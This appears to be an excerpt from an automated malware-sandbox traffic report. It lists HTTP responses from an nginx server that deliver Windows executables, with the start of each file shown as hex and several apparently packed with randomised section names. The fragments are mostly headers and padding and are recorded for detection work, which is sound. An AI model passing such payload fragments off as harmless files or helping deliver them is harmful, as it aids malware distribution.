00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:34:31 GMTContent-Type: application/octet-streamContent-Length: 279040Last-Modified: Mon, 17 Feb 2025 23:05:36 GMTConnection: keep-aliveETag: "67b3c0c0-44200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 43 5f 51 f8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 20 00 00 00 08 00 00 00 00 00 00 22 3a 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 04 00 00 06 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 39 00 00 4f 00 00 00 00 40 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 3c 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 1f 00 00 00 20 00 00 00 20 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 40 00 00 00 06 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 61 74 00 00 00 00 28 08 02 00 00 80 00 00 00 0a 02 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 61 74 00 00 00 00 28 08 02 00 00 a0 02 00 00 0a 02 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:34:37 GMTContent-Type: application/octet-streamContent-Length: 961024Last-Modified: Tue, 18 Feb 2025 06:22:24 GMTConnection: keep-aliveETag: "67b42720-eaa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 27 b4 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 dc 3c 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 4c 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:34:42 GMTContent-Type: application/octet-streamContent-Length: 1760768Last-Modified: Tue, 18 Feb 2025 06:23:06 GMTConnection: keep-aliveETag: "67b4274a-1ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 45 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 45 00 00 04 00 00 75 59 1b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 78 61 69 74 66 61 6d 00 60 1a 00 00 e0 2a 00 00 4e 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 67 62 79 69 62 6c 62 00 20 00 00 00 40 45 00 00 06 00 00 00 b6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 45 00 00 22 00 00 00 bc 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:34:58 GMTContent-Type: application/octet-streamContent-Length: 1760768Last-Modified: Tue, 18 Feb 2025 06:23:06 GMTConnection: keep-aliveETag: "67b4274a-1ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 45 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 45 00 00 04 00 00 75 59 1b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 78 61 69 74 66 61 6d 00 60 1a 00 00 e0 2a 00 00 4e 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 67 62 79 69 62 6c 62 00 20 00 00 00 40 45 00 00 06 00 00 00 b6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 45 00 00 22 00 00 00 bc 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:35:03 GMTContent-Type: application/octet-streamContent-Length: 2122240Last-Modified: Tue, 18 Feb 2025 06:24:24 GMTConnection: keep-aliveETag: "67b42798-206200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 90 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4a 00 00 04 00 00 ce d9 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 70 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 70 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 04 00 00 00 90 06 00 00 06 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 b0 06 00 00 02 00 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 7a 74 6d 73 62 6a 6a 00 b0 19 00 00 d0 30 00 00 a2 19 00 00 9a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6d 6d 7a 66 6d 61 71 00 10 00 00 00 80 4a 00 00 04 00 00 00 3c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4a 00 00 22 00 00 00 40 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:35:06 GMTContent-Type: application/octet-streamContent-Length: 342528Last-Modified: Mon, 17 Feb 2025 06:32:25 GMTConnection: keep-aliveETag: "67b2d7f9-53a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 a3 02 b2 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 86 04 00 00 b0 00 00 00 00 00 00 b0 b9 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 59 bc 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 05 00 7c 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 bd 04 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 85 04 00 00 10 00 00 00 86 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 07 21 00 00 00 a0 04 00 00 22 00 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d4 d3 00 00 00 d0 04 00 00 52 00 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 7c 3b 00 00 00 b0 05 00 00 3c 00 00 00 fe 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 18 Feb 2025 06:35:12 GMTContent-Type: application/octet-streamContent-Length: 2049024Last-Modified: Mon, 17 Feb 2025 17:56:09 GMTConnection: keep-aliveETag: "67b37839-1f4400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 4c 04 b2 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 84 04 00 00 b8 00 00 00 00 00 00 00 d0 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 49 00 00 04 00 00 28 9b 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 c0 05 00 6b 00 00 00 00 b0 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 a0 05 00 00 10 00 00 00 a0 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 b0 05 00 00 04 00 00 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 c0 05 00 00 02 00 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 29 00 00 d0 05 00 00 02 00 00 00 b6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 77 6e 61 77 61 6c 62 00 70 19 00 00 50 2f 00 00 66 19 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 75 6a 70 69 68 75 64 00 10 00 00 00 c0 48 00 00 04 00 00 00 1e 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 48 00 00 22 00 00 00 22 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 